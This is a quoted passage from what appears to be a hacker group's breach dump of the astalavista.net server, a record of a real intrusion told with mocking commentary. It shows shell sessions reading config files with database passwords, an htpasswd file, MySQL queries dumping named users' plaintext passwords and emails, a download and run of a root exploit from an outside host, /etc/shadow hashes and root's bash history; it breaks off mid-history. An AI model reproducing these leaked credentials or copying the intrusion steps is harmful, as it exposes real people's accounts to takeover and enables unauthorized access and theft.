>>  |     | 0            |                |
>> | backend_lang_id  | int(2) unsigned                          | NO
>>  |     | 0            |                |
>> | active           | tinyint(1)                               | NO
>>  |     | 0            |                |
>> | profile_access   | enum('everyone','members_only','nobody') | NO
>>  |     | members_only |                |
>> | restore_key      | varchar(32)                              | NO
>>  |     |              |                |
>> | restore_key_time | int(14) unsigned                         | NO
>>  |     | 0            |                |
>> | u2u_active       | enum('0','1')                            | NO
>>  |     | 1            |                |
>> +------------------+------------------------------------------+-----
>> -+-----+--------------+----------------+
>> 18 rows in set (0.00 sec)
>>
>> mysql> select username,password,email from contrexx_access_users
>> where is_admin = 1;
>> +------------+----------------------------------+-------------------
>> ----------+
>> | username   | password                         | email
>>          |
>> +------------+----------------------------------+-------------------
>> ----------+
>> | system     | 0defe9e458e745625fffbc215d7801c5 |
>> info@xxxxxxxxxxxxx          |
>> | prozac     | 1f65f06d9758599e9ad27cf9707f92b5 |
>> prozac@xxxxxxxxxxxxxxx      |
>> | Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a |
>> paulo.santos@xxxxxxxxxxxxxx |
>> | schmid     | 0defe9e458e745625fffbc215d7801c5 |
>> ivan.schmid@xxxxxxxxxxxxx   |
>> +------------+----------------------------------+-------------------
>> ----------+
>> 4 rows in set (0.04 sec)
>>
>> mysql> exit;
>> Bye
>>
>> [~] There you go, your "team of security and IT professionals" is a
>> joke.
>>
>> +------------------------------+
>> system:f82BN3+_*
>> Be1er0ph0r:belerophor4astacom
>> prozac:asta4cms!
>> commander:mpbdaagf6m
>> sykadul:ak29eral
>> +------------------------------+
>>
>> [~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his
>> milw0rm ripping script(s)
>>        ...and the others, find another area to get paid from, security
>> isn't for sale and you obviously fail at it.
>>
>> [~] Lets move to astalavista.net now,
>>
>> >From <https://www.astalavista.net/>:
>> >> Everyone knows that the best defense is a good offense.
>> >> Those who wait for their foes to find a security loophole are
>> opting for the wrong strategy.
>> >> The ASTALAVISTA hacking & security community is the largest IT
>> security community in the world.
>> >> It’s a platform for both IT specialists and novices, and anyone
>> interested in expanding and updating their knowledge regarding IT
>> security and hacking."
>>
>> >> Go ahead, try and hack our server Ð in a completely legal way!
>> >> Learn by doing: We offer our members tricky tasks and challenges
>> on an
>> >> ongoing basis so you can test your knowledge and abilities. You
>> can also
>> >> demonstrate what youÕve mastered by taking part in regular
>> hacker contests
>> >> and war games
>>
>> [~] Lets take a look there, after all... they are hack-proof,
>> aren't they?!
>>
>> [-] Tricky task: Find home dir of astalavista.net
>>
>> sh-3.2$ ls -la ~astanet
>> total 48
>> drwx--x--x  6 astanet astanet 4096 Dec 23 15:55 .
>> drwxr-xr-x 14 root    root    4096 Mar 11 17:56 ..
>> drwxr-xr-x  2 root    root    4096 Dec 23 16:00 auth
>> -rw-------  1 astanet astanet 3892 Apr 16 12:14 .bash_history
>> -rw-r--r--  1 astanet astanet   33 Dec 17 21:50 .bash_logout
>> -rw-r--r--  1 astanet astanet  176 Dec 17 21:50 .bash_profile
>> -rw-r--r--  1 astanet astanet  124 Dec 17 21:50 .bashrc
>> drwx--x--x  3 astanet astanet 4096 Dec 23 12:18 domains
>> drwxrwx---  3 astanet mail    4096 Dec 23 12:18 imap
>> drwx------  2 astanet astanet 4096 Dec 23 12:18 mail
>> lrwxrwxrwx  1 astanet astanet   37 Dec 23 12:18 public_html ->
>> ./domains/astalavista.net/public_html
>> -rw-r-----  1 astanet mail      34 Dec 22 12:41 .shadow
>>
>> sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
>> sh-3.2$ ls -la
>> total 200
>> drwxr-x--- 29 astanet apache   4096 Jan  6 13:58 .
>> drwx--x--x  8 astanet astanet  4096 Dec 23 13:53 ..
>> drwxr-xr-x  3 astanet astanet  4096 Dec 27  2006 _007
>> drwxr-xr-x  7 astanet astanet  4096 Jan  5  2006 _0mysql
>> drwxr-xr-x  7 astanet astanet  4096 Dec 22 14:16
>> astanet@xxxxxxxxxxxxxxx
>> drwxrwxrwx  2 astanet astanet  4096 Jan  5  2006 backend
>> drwxr-xr-x  2 astanet astanet  4096 Oct 24  2006 banner
>> -rw-r--r--  1 astanet astanet 25724 Apr  4  2006 banner.jpg
>> drwxr-xr-x  2 astanet astanet  4096 Aug 11  2006 config
>> drwxr-xr-x  3 astanet astanet  4096 Jan 12 08:52 cron
>> drwxr-xr-x 11 astanet astanet  4096 Jan  5  2006 dvd
>> -rw-r--r--  1 astanet astanet    36 Jan  5  2006 error.php
>> -rw-r--r--  1 astanet astanet  1406 Jan  5  2006 favicon.ico
>> drwxrwxrwx  2 astanet astanet  4096 Dec 15  2006 feed
>> drwxr-xr-x  3 astanet astanet  4096 Dec  8  2006 flashtour
>> -rw-r--r--  1 astanet astanet    18 Jan  5  2006 htaccess
>> -rw-r--r--  1 astanet astanet   585 Mar 24 14:50 .htaccess
>> -rw-r--r--  1 astanet astanet   398 Jan  5  2006 index1.php
>> -rw-r--r--  1 astanet astanet  1036 Jan  5  2006 _index.html
>> -rw-r--r--  1 astanet astanet  6880 Dec 23 14:44 index.php
>> -rw-r--r--  1 astanet astanet   676 Mar 21  2006 index_redirect.php
>> -rw-r--r--  1 astanet astanet   739 Feb 24  2006 index.swf
>> drwxr-xr-x  4 astanet astanet  4096 Oct 18  2006 irc
>> drwxr-xr-x  4 astanet astanet  4096 Aug 11  2006 lang
>> drwxr-xr-x 13 astanet astanet  4096 Sep 21  2006 lib
>> drwxr-xr-x  6 astanet astanet  4096 Aug 11  2006 log
>> drwxr-xr-x  2 astanet astanet  4096 Jan 13 14:02 member
>> drwxrwxrwx  5 astanet astanet  4096 Jun  4 00:03 memberdata
>> drwxr-xr-x  2 astanet astanet  4096 Jan  5  2006 new
>> -rw-r--r--  1 astanet astanet  7219 Feb 24  2006 pix1.swf
>> drwxr-xr-x  2 astanet astanet  4096 Oct 27  2006 re
>> -rw-r--r--  1 astanet astanet    23 Jan  5  2006 robots.txt
>> drwxr-xr-x  3 astanet astanet  4096 Aug 11  2006 rss
>> drwxr-xr-x 39 astanet astanet  4096 Dec 13  2007 sources
>> drwxrwxrwx  3 astanet astanet  4096 Feb  2 15:40 temp_com
>> drwxr-xr-x  7 astanet astanet  4096 Aug 11  2006 themes
>> drwxr-xr-x  2 astanet astanet  4096 Mar 14  2008 tmp_src
>> drwxr-xr-x  5 astanet astanet  4096 Aug 11  2006 tpl
>> drwxr-xr-x  3 astanet astanet  4096 Sep  7  2006 v2
>> drwxr-xr-x 16 astanet astanet  4096 Jul  5  2006 v2_old
>> -rw-r--r--  1 astanet astanet    35 Dec  4  2006 webcash.php
>> drwxr-xr-x 13 astanet astanet  4096 Sep 21  2006 wiki
>>
>> sh-3.2$ head -20 index.php
>> <?PHP
>> /**
>> * Mainfile (external) for astalavistaNET v2.0
>> *
>> * @copyright     Astalavista IT Engineering GmbH
>> * @author        Thomas Kaelin <thomas.kaelin@xxxxxxxxxxxxxx>
>> * @version       1.0
>> */
>>
>>        if ($_SERVER['PHP_SELF'] == '/webcash.php') {
>>                $dontStartSession = false;
>>        } else {
>>                $dontStartSession = true;
>>        }
>>
>> require_once($_SERVER['DOCUMENT_ROOT'].'/config/com.conf.php');
>>
>> require_once($_SERVER['DOCUMENT_ROOT'].'/config/ext.conf.php');
>>
>> require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].'com.cl
>> ass.php');
>>
>> require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].'ext.cl
>> ass.php');
>>
>> sh-3.2$ cd config
>> sh-3.2$ ls -la
>> total 32
>> drwxr-xr-x  2 astanet astanet 4096 Aug 11  2006 .
>> drwxr-x--- 29 astanet apache  4096 Jan  6 13:58 ..
>> -rw-r--r--  1 astanet astanet  987 Aug 11  2006 adm.conf.php
>> -rw-r--r--  1 astanet astanet 4937 Dec 23 15:48 com.conf.php
>> -rw-r--r--  1 astanet astanet  913 Aug 11  2006 cron.conf.php
>> -rw-r--r--  1 astanet astanet 1668 Aug 20  2008 ext.conf.php
>> -rw-r--r--  1 astanet astanet 2724 May 30  2007 int.conf.php
>>
>> sh-3.2$ cat com.conf.php
>> [snip]
>> //member-database
>> $_CONFIG['db_mem_server']       = 'localhost';
>> $_CONFIG['db_mem_database'] = 'astanet_membersystem';
>> $_CONFIG['db_mem_user']         = 'astanet_db';
>> $_CONFIG['db_mem_password'] = 'TXwVrC7hbq';
>> $_CONFIG['db_mem_debug']        = false; //true or false
>> //ads-database
>> $_CONFIG['db_ads_server']       = 'localhost';
>> $_CONFIG['db_ads_database'] = 'astanet_ads';
>> $_CONFIG['db_ads_user']         = 'astanet_db';
>> $_CONFIG['db_ads_password'] = 'TXwVrC7hbq';
>> $_CONFIG['db_ads_debug']        = false; //true or false
>> //rainbow-database
>> $_CONFIG['db_rainbow_server']   = '212.254.194.163';
>> $_CONFIG['db_rainbow_database'] = 'rainbow';
>> $_CONFIG['db_rainbow_user']     = 'dinu';
>> $_CONFIG['db_rainbow_password'] = 'dinudinu';
>> $_CONFIG['db_rainbow_debug']    = false; //true or false
>> //mailing lists database
>> $_CONFIG['db_mailing_lists_server']     = 'localhost';
>> $_CONFIG['db_mailing_lists_database']   = 'astanet_mailing_lists';
>> $_CONFIG['db_mailing_lists_user']               = 'astanet_db';
>> $_CONFIG['db_mailing_lists_password']   = 'TXwVrC7hbq';
>> $_CONFIG['db_mailing_lists_debug']              = false; //true or
>> false
>> //paypal
>> $_CONFIG['sub_pp_url']          = 'https://www.paypal.com/cgi-
>> bin/webscr';
>> $_CONFIG['sub_pp_cmd']          = '_xclick';
>> $_CONFIG['sub_pp_business'] = 'info@xxxxxxxxxxxxxxx';
>> $_CONFIG['sub_pp_noship']       = '1';
>> $_CONFIG['sub_pp_referer']      = 'https://www.paypal.com/';
>> [snip]
>>
>> sh-3.2$ cd ..
>> sh-3.2$ cd member
>> sh-3.2$ ls -la
>> total 20
>> drwxr-xr-x  2 astanet astanet 4096 Jan 13 14:02 .
>> drwxr-x--- 29 astanet apache  4096 Jan  6 13:58 ..
>> -rw-r--r--  1 astanet astanet   19 Jan 13 14:02 .htaccess
>> -rwxr-xr-x  1 astanet astanet 6709 Jan 13 14:06 index.php
>> sh-3.2$ cat .htaccess
>> SecFilterEngine off
>>
>> sh-3.2$ cd ..
>> sh-3.2$ cd cron
>> sh-3.2$ ls -la
>> total 168
>> drwxr-xr-x  3 astanet astanet  4096 Jan 12 08:52 .
>> drwxr-x--- 29 astanet apache   4096 Jan  6 13:58 ..
>> -rw-r--r--  1 astanet astanet  1272 Jan 12 08:24 0_corefile.php
>> -rw-r--r--  1 astanet astanet  2356 Aug 11  2006 0_functions.php
>> -rw-r--r--  1 astanet astanet  3616 Dec 23 15:44 1_daily.php
>> -rw-r--r--  1 astanet astanet   527 Aug 11  2006 1_fivemin.php
>> -rw-r--r--  1 astanet astanet  5006 Dec 23 15:39 1_hourly.php
>> -rw-r--r--  1 astanet astanet   432 Aug 11  2006 1_weekly.php
>> -rw-r--r--  1 astanet astanet  2277 Aug 11  2006 2_advertising.php
>> -rw-r--r--  1 astanet astanet  4882 Dec 23 15:40 2_archives.php
>> -rw-r--r--  1 astanet astanet  3784 Aug 16  2006 2_awstats.sh
>> -rw-r--r--  1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
>> -rw-r--r--  1 astanet astanet 14979 Jan 12 09:10 2_expire.php
>> -rw-r--r--  1 astanet astanet  7657 Aug 15  2006
>> 2_exploitree_updater.php
>> -rw-r--r--  1 astanet astanet   686 Dec 23 16:31 2_filesize.sh
>> -rw-r--r--  1 astanet astanet  9853 Aug 11  2006 2_keywords_old.php
>> -rw-r--r--  1 astanet astanet 15664 Sep 22  2006 2_keywords.php
>> -rw-r--r--  1 astanet astanet  1233 Aug 11  2006 2_proxy_checker.php
>> -rw-r--r--  1 astanet astanet  7558 Aug 11  2006
>> 2_proxy_collector.php
>> -rw-r--r--  1 astanet astanet   796 Aug 11  2006
>> 99_create_emails.php
>> drwxr-xr-x  2 astanet astanet  4096 Aug 11  2006 99_lang_email
>> -rw-r--r--  1 astanet astanet  9622 Jan  6 16:04 login_reminder.php
>> -rw-r--r--  1 astanet astanet  9620 Jan  6 16:05
>> login_reminder_test.php
>>
>> sh-3.2$ cd ..
>> sh-3.2$ cd _007
>> sh-3.2$ ls -la
>> total 24
>> drwxr-xr-x  3 astanet astanet 4096 Dec 27  2006 .
>> drwxr-x--- 29 astanet apache  4096 Jan  6 13:58 ..
>> -rw-r--r--  1 astanet astanet   96 Dec 23 15:17 .htaccess
>> -rw-r--r--  1 astanet astanet 3263 Jan 15  2007 index.php
>> -rw-r--r--  1 astanet astanet   20 Dec 27  2006 info.php
>> drwxr-xr-x  5 astanet astanet 4096 Aug 11  2006 sitemap
>>
>> sh-3.2$ cat  .htaccess
>> authType Basic
>> authName Admin
>> authUserFile /home/astanet/auth/.htadm_pwd
>> require valid-user
>>
>> sh-3.2$ cat /home/astanet/auth/.htadm_pwd
>> admin2net:CR0bl65MwhfT
>>
>> sh-3.2$ mysql -u astanet_db -p
>> Enter password:
>> Welcome to the MySQL monitor.  Commands end with ; or \g.
>> Your MySQL connection id is 275153
>> Server version: 5.0.45-community-log MySQL Community Edition (GPL)
>>
>> Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
>>
>> mysql> show databases;
>> +-----------------------+
>> | Database              |
>> +-----------------------+
>> | information_schema    |
>> | astanet_ads           |
>> | astanet_mailing_lists |
>> | astanet_mediawiki     |
>> | astanet_membersystem  |
>> | test                  |
>> +-----------------------+
>> 6 rows in set (0.00 sec)
>>
>> mysql> use astanet_membersystem
>> Database changed
>> mysql> show tables;
>> +-----------------------------------+
>> | Tables_in_astanet_membersystem    |
>> +-----------------------------------+
>> | blacklist_categories              |
>> | blacklist_content                 |
>> | blacklist_levels                  |
>> | blacklist_mcset                   |
>> | dir_categories                    |
>> | dir_comments                      |
>> | dir_links                         |
>> | dir_temp                          |
>> | dir_votes                         |
>> | documents                         |
>> | documents_categories              |
>> | email_content                     |
>> | email_settings                    |
>> | exploits                          |
>> | exploits_categories               |
>> | exploittree_categories            |
>> | exploittree_exploits              |
>> | home_values                       |
>> | iso_countries                     |
>> | links_categories                  |
>> | links_records                     |
>> | links_unauth                      |
>> | links_votes                       |
>> | log                               |
>> | news_categories                   |
>> | news_comments                     |
>> | news_emoticons                    |
>> | news_latest                       |
>> | news_messages                     |
>> | news_statistics                   |
>> | news_votes                        |
>> | prices_content                    |
>> | prices_offers                     |
>> | rss_settings                      |
>> | sessions                          |
>> | stats_signups                     |
>> | u2u2                              |
>> | u2u_contact                       |
>> | u2u_settings                      |
>> | user_keywords_selected_categories |
>> | users                             |
>> | users_ipn_test                    |
>> | users_keyword_values              |
>> | users_profile                     |
>> | users_temp                        |
>> | users_upgrade                     |
>> +-----------------------------------+
>> 46 rows in set (0.00 sec)
>>
>> mysql> describe users;
>> +--------------------------+--------------------------------------+-
>> -----+-----+---------------------+----------------+
>> | Field                    | Type                                 |
>> Null | Key | Default             | Extra          |
>> +--------------------------+--------------------------------------+-
>> -----+-----+---------------------+----------------+
>> | primary_key              | smallint(5) unsigned                 |
>> NO   | PRI | NULL                | auto_increment |
>> | user                     | varchar(50)                          |
>> NO   |     |                     |                |
>> | nickname                 | varchar(30)                          |
>> NO   | MUL | anonymous           |                |
>> | password                 | varchar(30)                          |
>> NO   |     |                     |                |
>> | userlevel                | tinyint(3)                           |
>> YES  | MUL | NULL                |                |
>> | exp                      | int(8) unsigned                      |
>> NO   |     | 0                   |                |
>> | email                    | varchar(50)                          |
>> NO   |     |                     |                |
>> | ip                       | varchar(15)                          |
>> NO   |     | 0                   |                |
>> | proxy                    | set('0','1')                         |
>> NO   |     | 0                   |                |
>> | logtime                  | timestamp                            |
>> NO   |     | CURRENT_TIMESTAMP   |                |
>> | login_reminder_last_sent | timestamp                            |
>> NO   |     | 0000-00-00 00:00:00 |                |
>> | anz_in                   | tinyint(1)                           |
>> NO   |     | -1                  |                |
>> | status                   | tinyint(1) unsigned                  |
>> NO   |     | 0                   |                |
>> | checked                  | set('0','1','2')                     |
>> NO   |     | 0                   |                |
>> | freemember               | set('0','1')                         |
>> NO   |     | 0                   |                |
>> | ordertype                | set('transfer','wp','pp','mc','CnB') |
>> YES  |     | NULL                |                |
>> | lang                     | tinytext                             |
>> NO   |     |                     |                |
>> | adid                     | smallint(6)                          |
>> NO   |     | 0                   |                |
>> | pp_txn_id                | varchar(255)                         |
>> YES  |     | NULL                |                |
>> | cnb_transaction_id       | varchar(255)                         |
>> YES  |     | NULL                |                |
>> | cnb_order_id             | varchar(255)                         |
>> YES  |     | NULL                |                |
>> | cnb_user_id              | int(11)                              |
>> YES  |     | 0                   |                |
>> +--------------------------+--------------------------------------+-
>> -----+-----+---------------------+----------------+
>> 22 rows in set (0.01 sec)
>>
>> mysql> select count(*) as skids from users;
>> +-------+
>> | skids |
>> +-------+
>> | 25199 |
>> +-------+
>> 1 row in set (0.00 sec)
>>
>> mysql> select user,nickname,password,email from users where
>> userlevel = 1;
>> +--------------------------+----------------------+-----------------
>> -+-----------------------------------+
>> | user                     | nickname             | password
>>  | email                             |
>> +--------------------------+----------------------+-----------------
>> -+-----------------------------------+
>> | pascal                   | prozac               | astaman3
>>  | info@xxxxxxxxxxxxxxx              |
>> | Ivan Schmid              | rOOtless1            |
>> astalavista4asta | ivan.schmid@xxxxxxxxxxxxx         |
>> | qreymer                  | Palermo              | qblsw85iam
>>  | eche@xxxxxxx                      |
>> | Christian Wehrli         | g0atherd             | hitt?74
>>  | g0atherd@xxxxxxx                  |
>> | Andrew Blake             | Minky                | liq73uid
>>  | a.blake@xxxxxxxxxxxxx             |
>> | Martin Wyss              | dinu                 | kj63;cXy
>>  | martin.wyss@xxxxxxxxxxxxxxx       |
>> | Leandro Nery             | Timan_no_Sanco       | nery2002
>>  | leandronery@xxxxxxxxxxx           |
>> | shaving ryans privates   | ShavingRyansPrivates | memberboard313
>>  | shavingryansprivates1@xxxxxxxxxxx |
>> | Gerben van der Lubbe     | Spoofed Existence    | Lb59eXg5
>>  | spoofedexistence@xxxxxxxxxxx      |
>> | David M Lee              | Daremo               | icG12m03
>>  | daremo@xxxxxxxxxxxxxxxx           |
>> | David Corn               | akriel               | ve3uB$cUku
>>  | akriel@xxxxxxxxxxxxxx             |
>> | Thomas Kalin             | Gwanun               | QwErTy123
>>  | thomas.kaelin@xxxxxxxxxxxxxxx     |
>> | Marcus unknown           | Cra58cker            | hhCr4ck06
>>  | unknownmarcus@xxxxxxxxxxx         |
>> | David Ellis              | dellis203            | philip
>>  | dellis@xxxxxxxxxxxxxxxxx          |
>> | Lars Christian Solberg   | xeor                 | tF3s4|Nea
>>  | xeor@xxxxxxxx                     |
>> | Paulo Santos             | Be1er0ph0r1          | amor01
>>  | pmsantos@xxxxxx                   |
>> | Thomas D?ppen            | daha                 | asta4tom
>>  | thomas.daeppen@xxxxxxxxxxxxxx     |
>> | Touraj Abbasi Moghaddasi | -Crow1               | NetR0ck
>>  | toraj.a.m@xxxxxxxxx               |
>> | Fabius Bernet            | traviser             | wellenreiter100
>>  | fabius.bernet@xxxxxxxxxxxxxx      |
>> | Zachary McElroy          | duder1               | dirty245dix
>>  | mcelroyzj@xxxxxxxxx               |
>> | Leron Cohen              | cohen2               | leron4free
>>  | leron@xxxxxxxxxxxxxxx             |
>> | Beatriz Pontes           | anonymous1656        | pitas
>>  | joao.pedro.pontes@xxxxxxxxx       |
>> | Glafkos Charalambous     | anonymous2086        | si99490178$#
>>  | nowayout@xxxxxxxxxxxxxxx          |
>> | developer COMVATION      | anonymous2402        | Ri?Q$Q$MVU
>>  | ivan.schmid@xxxxxxxxxxxxxx        |
>> | Peter Fisher             | cyph3r1              | testZer025435
>>  | cyph3r@xxxxxxxxxxxxxxx            |
>> | sykadul                  | sykadul              | ak29eral
>>  | sykadul@xxxxxxxxx                 |
>> | Ronny Janzi              | commander1           | mpbdaagf6m
>>  | ronny.janzi@xxxxxxxxxxxxxx        |
>> +--------------------------+----------------------+-----------------
>> -+-----------------------------------+
>> 27 rows in set (0.00 sec)
>>
>> mysql> exit;
>> Bye
>>
>> [~] plaintext passwords? yes,
>>        Those so called "security professionals" who charge you $6.66 /
>> month to
>>        register at their hack-proof portal, save your passwords in
>> plaintext...
>>        brilliant!
>>
>>
>> [~] This been fun but we want more.
>>
>> sh-3.2$ uname -a
>> Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu
>> May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
>> sh-3.2$ wget http://anti.sec.labs/g0troot
>> --13:33:37--  http://anti.sec.labs/g0troot
>> Resolving anti.sec.labs... 13.33.33.37
>> Connecting to anti.sec.labs|13.33.33.37|:80... connected.
>> HTTP request sent, awaiting response... 200 OK
>> Length: 18200 (18K) [text/plain]
>> Saving to: `g0troot'
>>
>> 100%[===============================================================
>> ====================================================================
>> ======>] 18,200      58.6K/s   in 0.3s
>>
>> 18:55:14 (58.6 KB/s) - `g0troot' saved [18200/18200]
>>
>> sh-3.2$ ./g0troot -i x86_64
>>        [+] g0troot - anti.sec.labs
>>        [+] Target: 2.6.18-128.1.10.el5
>>        [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
>>
>>        [+] r00tr00t
>>        [~] Executing shell...
>>
>> sh-3.2# id
>> uid=0(root) gid=0(root)
>> groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
>>
>> sh-3.2# cat /etc/shadow
>> root:$1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
>> [snip]
>> admin:$1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
>> jon:$1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
>> com:$1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
>> astanet:$1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
>>
>> sh-3.2# cat /etc/motd
>> #####################################################
>> #____ ____ ___ ____ _    ____ _  _ _ ____ ___ ____  #
>> # |__| [__   |  |__| |    |__| |  | | [__   |  |__| #
>> # |  | ___]  |  |  | |___ |  |  \/  | ___]  |  |  | #
>> #                                                   #
>> #####################################################
>> #                                                   #
>> # Admin Contact - support@xxxxxxxxxxxxxxxxxxxx      #
>> #                                                   #
>> # Available ShortCuts                               #
>> #                                                   #
>> # nst -  list active connections                    #
>> # ddos - shows how many times each ip is connected  #
>> # ltr -  restart the webserver                      #
>> # phpc - edit the php config file                   #
>> # htc -  edit the webserver configuration file      #
>> # up -   uptime                                     #
>> # etd - edit the motd of the day file               #
>> # htr - start and restart apache if needed          #
>> # syng - shows active SYN_RECV connections          #
>> # synd - syn flood blocker - "synd -h" for usage    #
>> #####################################################
>> # NOTES:                                            #
>> # Last Upgrade - 12-08-2008 by JF                   #
>> # My.cnf/Mysql Optimization - 1-28-09               #
>> #                                                   #
>> #                                                   #
>> #                                                   #
>> #####################################################
>>
>> sh-3.2# lastlog | grep -v Never
>> Username         Port     From             Latest
>> root             pts/1    adsl-194-162-fix Thu Jun  4 07:19:14
>> +0000 2009
>> admin            pts/1    cp.secureservert Thu Mar 20 10:25:39
>> +0000 2008
>> com              pts/0    cust.static.212- Tue Jun  2 07:46:30
>> +0000 2009
>> astanet          pts/0    adsl-194-162-fix Thu Apr 16 08:20:44
>> +0000 2009
>>
>> sh-3.2# ls -la
>> total 453376
>> drwxr-x--- 15 root root       4096 Jun  4 08:40 .
>> drwxr-xr-x 25 root root       4096 Jun  3 02:43 ..
>> -rw-r--r--  1 root root    2394400 Oct 19  2007 10mbtest.zip
>> -rw-------  1 root root       1006 Sep 11  2007 anaconda-ks.cfg
>> -rw-------  1 root root      16836 Jun  4 07:21 .bash_history
>> -rw-r--r--  1 root root         24 Jan  6  2007 .bash_logout
>> -rw-r--r--  1 root root        191 Jan  6  2007 .bash_profile
>> -rw-r--r--  1 root root        176 Jan  6  2007 .bashrc
>> -rwx------  1 root root       1899 Oct 28  2007 bk.sh
>> -rw-r--r--  1 root root       1327 Nov 29  2007 cert
>> -rw-r--r--  1 root root  139860821 May 14  2008
>> contrexxbackup_20080514.sql
>> drwxr-xr-x  4 root root       4096 May 20  2008 .cpan
>> -rw-r--r--  1 root root        100 Jan  6  2007 .cshrc
>> -rw-r--r--  1 root root     323079 Mar 31 13:48 defaultp_ports.sql
>> drwx------  2 root root       4096 Oct 28  2007 .elinks
>> drwxr-xr-x 13 root root       4096 Mar 21  2008 gdb-6.7.1
>> -rw-r--r--  1 root root   15080950 Oct 29  2007 gdb-6.7.1.tar.bz2
>> -rw-------  1 root root          0 Apr 16 13:19 .history
>> -rw-r--r--  1 root root      16095 Sep 11  2007 install.log
>> -rw-r--r--  1 root root       2566 Sep 11  2007 install.log.syslog
>> -rw-r--r--  1 root root       1003 Jul 22  2007 install.sh
>> -rw-------  1 root root         35 Jun  2 14:23 .lesshst
>> drwxr-xr-x  2 root root       4096 Dec 29  2007 .lftp
>> drwxr-xr-x 10 root root       4096 Sep 14  2007 linux-2.6.19.2-grsec
>> -rw-r--r--  1 root root   94979336 Feb 16  2007 linux-2.6.19.2-
>> grsec.tar.gz
>> -rw-r--r--  1 root root    4737058 Sep 22  2007 linux-2.6.22.tar.bz2
>> -rwx------  1 root root        760 Sep 18  2008 lp
>> drwxr-xr-x 12 root root       4096 Nov 30  2007 lsws-3.3.1
>> -rw-r--r--  1 root root    2480045 Nov 30  2007 lsws-3.3.1-ent-
>> x86_64-linux.tar.gz
>> -rw-r--r--  1 root root    6388501 Nov 29  2007 lsws-3.3.1-ent-
>> x86_64-linux.tar.gz.1
>> drwxr-xr-x 12 root root       4096 Mar 21  2008 lsws-3.3.9
>> -rw-r--r--  1 root root    6437577 Mar 21  2008 lsws-3.3.9-ent-
>> x86_64-linux.tar.gz
>> drwxr-xr-x 12 root root       4096 May 29 15:10 lsws-4.0.3
>> -rw-r--r--  1 root root    6496050 May  8 05:59 lsws-4.0.3-ent-
>> x86_64-linux.tar.gz
>> -rw-r--r--  1 root root      25316 Feb 15  2006 mybk.sh
>> -rw-------  1 root root         41 Oct 19  2007 .my.cnf
>> -rw-------  1 root root       2902 Jun  4 08:40 .mysql_history
>> -rwx------  1 root root      38873 Apr 16  2008 mysqlreport
>> -rw-------  1 root root         41 May 20  2008 .mytop
>> drwxr-xr-x  3 1000  1000      4096 May 20  2008 mytop-1.6
>> -rw-r--r--  1 root root      19720 Feb 17  2007 mytop-1.6.tar.gz
>> drwxr-xr-x  2 root root       4096 Oct 28  2007 .ncftp
>> -rw-------  1 root root       1462 Sep 21  2007 opt.php
>> -rw-r--r--  1 root root       3371 Sep 22  2007 p
>> -rw-r--r--  1 root root    7608429 Aug 30  2007 php-5.2.4.tar.bz2
>> -rw-------  1 root root       1024 Feb  3 21:32 .rnd
>> -rw-r--r--  1 root root        716 Nov 28  2007 server.csr
>> -rw-r--r--  1 root root        887 Nov 28  2007 server.key
>> drwx------  2 root root       4096 Oct 10  2008 .ssh
>> -rw-r--r--  1 root root      44227 Oct 28  2007 tar-inc-backup.dat
>> -rw-r--r--  1 root root        129 Jan  6  2007 .tcshrc
>> -rw-r--r--  1 root root  104874307 Oct 17  2007 test100.zip
>> -rw-r--r--  1 root root   67085540 Oct 19  2007 test100.zip.1
>> drwxr-xr-x  2 root root       4096 Apr 29 11:15 tmp
>> -rw-r--r--  1 root root      42596 May 21  2007 tuning-primer.sh
>> drwxrwxrwx 19 1000 users      4096 Mar 21  2008 valgrind-3.3.0
>> -rw-r--r--  1 root root    4519551 Dec 11  2007 valgrind-
>> 3.3.0.tar.bz2
>> -rw-------  1 root root      12997 May 16  2008 .viminfo
>>
>> sh-3.2# cat .bash_history
>> [snip]
>> wget cp4sst.com/sstlinux.tar.gz
>> tar zxvf sstlinux.tar.gz
>> cd linux-2.6.27.10
>> sh install.sh
>> make bzImage ; make modules ; make modules_install ; make install
>> make clean
>> service mysqld restart
>> [snip]
>> cd /usr/sbin/
>> chmod 4777 traceroute
>> chmod 4777 ping
>> traceroute -I www.astalavista.ch
>> [snip]
>> vi /etc/csf/csf.conf
>> traceroute google.ch
>> service csf restart
>> tracert google.ch
>> service csf restart
>> traceroute www.google.ch
>> tracert www.google.ch
>> traceroute www.google.ch
>> locate traceroute
>> chown 4755 /bin/traceroute
>> chown 4777 /bin/traceroute
>> locate ping
>> chown 4755 /bin/ping
>> chown 4777 /bin/ping
>> cd /bin/
>> ls -ali | grep ping
>> chown root ping
>> chmod 4755 ping
>> ls -ali | grep traceroute
>> chown root traceroute
>> chmod 4755 traceroute
>> ls -ali | grep traceroute
>> traceroute -I www.google.ch
>> traceroute www.google.ch
>> whois pmsantos.ch
>> [snip]
>> mysql -h com_contrexx2_live < /root/defaultp_ports.sql
>> mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live <
>> /root/defaultp_ports.sql
>> mysql -h -u contrexxuser2 -p com_contrexx2_live <
>> /root/defaultp_ports.sql
>> mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
>> top
>> ping ssth.ch
>> ping asdlkfaljgasd???ljg???lasj.ch
>> ping asdlkfaljgasdlasj.ch
>> ping www.ssth.ch
>> ping ssth.ch
>> nslookup www.google.ch
>> nslookup www.ssth.ch
>> man nslookup
>> ping www.google.ch
>> nslookup www.google.ch
>> nslookup www.google.ch
>> nslookup salfjasdlf.ch
>> [snip]
>> openssl passwd -1 sadf
>> openssl passwd -1 5cZNHstdTy
>> mysql
>> mysql
>> locate proftp
